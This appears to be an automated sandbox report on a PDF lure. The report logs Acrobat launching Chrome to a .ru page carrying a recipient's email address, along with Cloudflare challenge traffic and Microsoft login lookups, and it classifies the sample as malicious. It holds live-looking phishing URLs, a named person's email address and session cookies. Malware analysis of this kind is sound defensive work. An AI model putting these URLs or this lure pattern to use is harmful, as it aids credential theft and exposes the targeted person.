Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nrw71/0x4AAAAAAA1mOjQlyo8gEN4C/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://sung.ethamoskag.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe714c69d748c29&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nrw71/0x4AAAAAAA1mOjQlyo8gEN4C/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nrw71/0x4AAAAAAA1mOjQlyo8gEN4C/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: sung.ethamoskag.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sung.ethamoskag.ru/0cUrcw3/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InVnRlMyak5RQzhaaXN4ZGpIOWJnVVE9PSIsInZhbHVlIjoiN1lqdW5LenhEbTVENFBHeGgvK1lMVUVlb1k1SGZtaEMwanhlV096Y0lDR2cyek9KTEQrbmJwVGttVUFYWFNUek1CTWdhR29nTkNPN3pJcllIRTgxV0xZN01aakJWaTlPWlM1TEo3bkZ5bnY5ZUtBcmdRUUxRN1p3Y0MwY0M4Q1EiLCJtYWMiOiI2MWQ2Yjg0NTI1YjE2ZjBmYjNmMGJiNDI2Y2E1YTI2ZDlhN2Q1ZWQzYzZiZDQ2OTE1NmU3OGRkNDgxZTkxYjMxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFTMXc1cjJMOTB6VEVPVW13aHQrZFE9PSIsInZhbHVlIjoiMWh0WldJalVvWWlOeklCSyszL2JDZlFRdWJRUFFWY3BISWNieHltM2xvMTl2bjR1QTBxcFd6V0NqTWEya2J6emZtSzdCMmZCeklBY2I1ZXhCblREZC91eWJuVWtUaUxJYVBhZnY1ZHVxcURBV2NOYlEvVXIvQXlJaFM2cG1TM3YiLCJtYWMiOiI0ODA3ZmY3ZTRiMDc1OGQyZjEwN2Y4NmIwM2Q0N2E3ZWI4ZjdjM2QxMjkyNDI4Zjk3NTU2ZDg0MGQxN2Y3OTIwIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe714c69d748c29&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1702680241:1736281743:oHkGzRQEm0XBvPLraYKhN6D7o1wYu-qyAvxbR8tTHnY/8fe714c69d748c29/D9FHRl2BpZjliNMgDyuZOYbu5d2HtaznsinZzmz5MBU-1736285763-1.1.1.1-HKIOzuGxr_aQvzCfppdTbPN_zP_Hq18hKmQyJT3mFLCaJY32a.duvmYyY6NCi1it HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fe714c69d748c29/1736285766203/aPZ_CcXDlBoyNcS HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nrw71/0x4AAAAAAA1mOjQlyo8gEN4C/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fe714c69d748c29/1736285766203/aPZ_CcXDlBoyNcS HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8fe714c69d748c29/1736285766207/49c14c3b2e7a23b87f706815c596ec9ea68094171ae7dafa90c98c13a88b7c48/smJmz9q7H4detGh HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nrw71/0x4AAAAAAA1mOjQlyo8gEN4C/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1702680241:1736281743:oHkGzRQEm0XBvPLraYKhN6D7o1wYu-qyAvxbR8tTHnY/8fe714c69d748c29/D9FHRl2BpZjliNMgDyuZOYbu5d2HtaznsinZzmz5MBU-1736285763-1.1.1.1-HKIOzuGxr_aQvzCfppdTbPN_zP_Hq18hKmQyJT3mFLCaJY32a.duvmYyY6NCi1it HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1702680241:1736281743:oHkGzRQEm0XBvPLraYKhN6D7o1wYu-qyAvxbR8tTHnY/8fe714c69d748c29/D9FHRl2BpZjliNMgDyuZOYbu5d2HtaznsinZzmz5MBU-1736285763-1.1.1.1-HKIOzuGxr_aQvzCfppdTbPN_zP_Hq18hKmQyJT3mFLCaJY32a.duvmYyY6NCi1it HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bGrWZhCIwGpWkaIdpPnuUFfslfCeBeDRKHZKADKCNXZXAZCXUXPAEARFZCXPKUBHYWRMDRDNWLYJRUHRJRDKA HTTP/1.1Host: oc2lywudcicvf3zkzgbl7dddmd3whscnaebpxb4wz1idtmlwhfeig.ivertoneym.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://sung.ethamoskag.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://sung.ethamoskag.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bGrWZhCIwGpWkaIdpPnuUFfslfCeBeDRKHZKADKCNXZXAZCXUXPAEARFZCXPKUBHYWRMDRDNWLYJRUHRJRDKA HTTP/1.1Host: oc2lywudcicvf3zkzgbl7dddmd3whscnaebpxb4wz1idtmlwhfeig.ivertoneym.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: sung.ethamoskag.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: oc2lywudcicvf3zkzgbl7dddmd3whscnaebpxb4wz1idtmlwhfeig.ivertoneym.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1702680241:1736281743:oHkGzRQEm0XBvPLraYKhN6D7o1wYu-qyAvxbR8tTHnY/8fe714c69d748c29/D9FHRl2BpZjliNMgDyuZOYbu5d2HtaznsinZzmz5MBU-1736285763-1.1.1.1-HKIOzuGxr_aQvzCfppdTbPN_zP_Hq18hKmQyJT3mFLCaJY32a.duvmYyY6NCi1it HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3166sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: D9FHRl2BpZjliNMgDyuZOYbu5d2HtaznsinZzmz5MBU-1736285763-1.1.1.1-HKIOzuGxr_aQvzCfppdTbPN_zP_Hq18hKmQyJT3mFLCaJY32a.duvmYyY6NCi1itsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/nrw71/0x4AAAAAAA1mOjQlyo8gEN4C/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 21:36:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iiKpM3n5M0fDNFnrDcDsMdQtkaIjKmToRccg3viDHjNqN2XOzqX88%2FevpVitsfcfzvfW4rw3Mj8Ssv5w8%2FulVhzXQNf5iKkZCM0tl4XQVNCBSNUBj3pu56sR4ZbU3w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=934&min_rtt=893&rtt_var=273&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2237&delivery_rate=4320512&cwnd=253&unsent_bytes=0&cid=9c5e543b4d29492b&ts=449&x=0"CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 8fe714cd1f4a42bb-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1804&rtt_var=685&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1901&delivery_rate=1588683&cwnd=193&unsent_bytes=0&cid=0679275d2c48b8f6&ts=5463&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 21:36:07 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 4gbT4mhqn6utbdIk2uE3PM7Id1vMzXY045s=$tIx11G/KRSXaMRyBcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8fe714dcd823729b-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 21:36:10 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: /7YWgG74/1c4gJ4PoPRZ9ya/tP4PSTLAzrA=$TKG6EvyJr7krZuPnServer: cloudflareCF-RAY: 8fe714f0a89ac336-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 21:36:30 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: TgKJMeb6+VpLNVXEpnwO1uP5QKNZ08SNJcc=$iSiebmWaHfYgKJhKServer: cloudflareCF-RAY: 8fe715702cfb4399-EWRalt-svc: h3=":443"; ma=86400
Source: 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 2D85F72862B55C4EADD9E66E06947F3D0.2.drString found in binary or memory: http://x1.i.lencr.org/
Source: da08b85e-ef1f-4e78-8401-d39604470569.tmp.3.dr, 64dccbd6-f575-4c5d-8458-9088b6140f56.tmp.3.drString found in binary or memory: https://chrome.cloudflare-dns.com
Source: chromecache_208.16.dr, chromecache_199.16.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_208.16.dr, chromecache_199.16.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownHTTPS traffic detected: 13.107.246.254:443 -> 192.168.2.16:49769 version: TLS 1.2
Source: classification engineClassification label: mal52.winPDF@32/125@34/10
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-07 16-34-38-142.logJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Sburkholder.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1556 --field-trial-handle=1496,i,10005414482586613621,10229627965643939446,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sung.ethamoskag.ru/0cUrcw3/#Msburkholder@heartland-derm.com
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2004,i,17975387101299091926,15807436592221751878,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1556 --field-trial-handle=1496,i,10005414482586613621,10229627965643939446,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2004,i,17975387101299091926,15807436592221751878,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
